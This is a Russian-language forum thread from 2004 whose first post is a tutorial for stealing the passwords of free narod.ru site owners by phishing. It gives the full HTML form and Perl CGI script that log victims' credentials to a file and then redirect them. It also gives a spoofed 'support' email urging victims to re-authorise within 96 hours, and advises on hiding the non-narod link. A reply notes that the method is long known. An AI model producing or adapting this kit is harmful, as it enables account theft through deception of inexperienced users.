Zmei Posted January 20, 2004 Report Share Posted January 20, 2004 Взлом на уровне карапуза (как сломать сайты на narod.ru и других бесплатных хостингах) -------------------------------------------------------------------------------- Вот сидел я и решил всё таки написать. Основа статьи это социальная инженерия, о которой уже было написано не мало. Не буду повторяться. Этот трюк можно провести со всеми новичками в сети Интернет. А рассматривать мы его будем уже на «банальном» хостинге narod.ru.(Повторюсь: его можно проделать на любом бесплатном хостинге, да даже и на платном моно попробовать Начнём для проведения нижеописанных действий вам понадобятся: 1. Мозги 2. Руки 3. Хостинг с поддержкой CGI 4. Небольшое знание HTML И так ищем жертву… У нас она будет xxx.narod.ru. Вообще для этого случая нужно искать не заброшенный сайт. И чтобы в контактах было мыло типа [email protected] Теперь нагло сдираем face народа Подправляем его, как надо, вставляем туда форму: <form action="write.cgi" method="post"> <input name="name" value=".narod.ru"><br> <input type="password" length="20" name="pass"><br> <input type="submit" value="подтвердить"> </form> Ещё надо написать write.cgi: &GetFormInput; $name=$field{'name'}; $pass=$field{'pass'}; sub GetFormInput { (*fval) = @_ if @_ ; local ($buf); if ($ENV{'REQUEST_METHOD'} eq 'POST') { read(STDIN,$buf,$ENV{'CONTENT_LENGTH'}); } else { $buf=$ENV{'QUERY_STRING'}; } if ($buf eq "") { return 0 ; } else { @fval=split(/&/,$buf); foreach $i (0 .. $#fval){ ($name,$val)=split (/=/,$fval[$i],2); $val=~tr/+/ /; $val=~ s/%(..)/pack("c",hex($1))/ge; $name=~tr/+/ /; $name=~ s/%(..)/pack("c",hex($1))/ge; if (!defined($field{$name})) { $field{$name}=$val; } else { $field{$name} .= ",$val"; } } } return 1; } open (OUTFILE, ">>pass.txt"); print OUTFILE "$name"; print OUTFILE "\n$pass"; print OUTFILE "\n=======END=======\n\n"; close (OUTFILE); print "Location: http://your_redirect_URL\n" ; Последняя строчка это перенаправление. Лучше послать на главную страницу народа. Всё наш сайт мы подготовили. Теперь пишем этому "карапузу" (прим. Eraser'a : телепузу =)) письмо с анонимного мыла от [email protected] вида: "Здравствуйте ваш сайт пытались взломать и вам срочно не позже чем через 96 часов надо пройти повторную авторизацию. Идите по ссылке(ага вот тута он и отдаст нам пароль) а ссылочка, то вы скажите видно будет, что не народовская... А я скажу вам нифига... А зачем нам nslookup? Вот так вот. короче ссылка будет вида: IP_ВАШЕГО_САЙТА/ sign.html . Усё готово.. теперь токо надо ждать . Дополнение: В доставание пароля вам поможет ваша фантазия при написание письма лопуху... Quote Link to post Share on other sites
Karmir Posted January 27, 2004 Report Share Posted January 27, 2004 Этот метод я знаю давно. Социальная инженерия или как там это называется? Quote Link to post Share on other sites
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.